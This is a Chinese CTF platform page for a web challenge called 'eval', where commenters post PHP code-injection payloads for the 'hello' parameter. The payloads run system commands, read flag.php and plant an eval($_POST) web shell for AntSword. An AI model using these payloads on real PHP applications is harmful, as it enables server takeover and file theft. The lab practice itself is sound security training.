evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 19437
提  示:
描  述:
eval
...
登录回复
评论
ubudj 9月前
举报

?hello=file(%27flag.php%27) ,%27 是单引号(')的 URL 编码形式。 确保 file() 函数能正确识别要读取的文件名

回复 1
默认 9月前
举报

hello=a=system('ls'),发现能输出东西,剩下的就是ls换成你想要做的命令,然后试试cat flag.php 这个cat是输出东西的,然后换成其他的东西都行,cat不行就tac,能出来答案 ps:在根目录下有一个叫做flag的文件,这里用 cat /flag 是没有问题的

回复 1
wywsssf 9月前
举报

找到参数hello,首先?hello=system('ls'),看到flag.php,再执行?hello=system('cat flag.php'),发现无内容,尝试把cat换成tac则成功

回复 0
dlgz 9月前
举报

?hello=file(%27flag.php%27) ?hello=system(%27tac%20f*%27)

回复 1
wuzhi唔知 10月前
举报

http://IP:PORT/?hello="<input%20value=%27$flag%27>" ---TEST end

回复 0
Bruce20231767 10月前
举报

http://117.72.52.127:18257/?hello=system(%22tac%20flag.php%22)

回复 0
lmds 10月前
举报

?hello=passthru('tac flag.php')

回复 0
TUGUNBB 10月前
举报

?hello=system("base64 flag.php"),拿到的东西base64解码就行了

回复 0
iNMB 10月前
举报

简单粗暴,直接连蚁剑?hello=);eval($_POST[%27attack%27]);//

回复 1
一个姓⎝李⎠的师傅~ 9月前
举报

@a6819772 看你 \$_POST['这里用什么接收'] 就填写什么密码

回复 1
a6819772 10月前
举报

密码填什么 连蚁剑的话

回复 1
SLfanCTF 10月前
举报

?hello=show_source(next(array_reverse(scandir(current(localeconv())))))

回复 0

WriteUp

image
harry

1 金币

立即查看

评分(10)

解题动态

九久 攻破了该题 14分钟前
jwz 攻破了该题 2小时前
胡look 攻破了该题 3小时前
MAO 攻破了该题 15小时前
eee5588 攻破了该题 18小时前
zzasas 攻破了该题 20小时前
安藏七月 攻破了该题 21小时前
大宋iu后的 攻破了该题 21小时前
Rx 攻破了该题 1天前
浪鸭 攻破了该题 1天前
千万 攻破了该题 1天前
13246563665 攻破了该题 1天前
18369735915 攻破了该题 1天前
popidojdow 攻破了该题 1天前
GDGZ_CTF 攻破了该题 1天前
纳百川. 攻破了该题 1天前
link7788 攻破了该题 2天前
langzifun 攻破了该题 2天前
小贾小贾 攻破了该题 2天前
yezhongyu 攻破了该题 2天前
问题反馈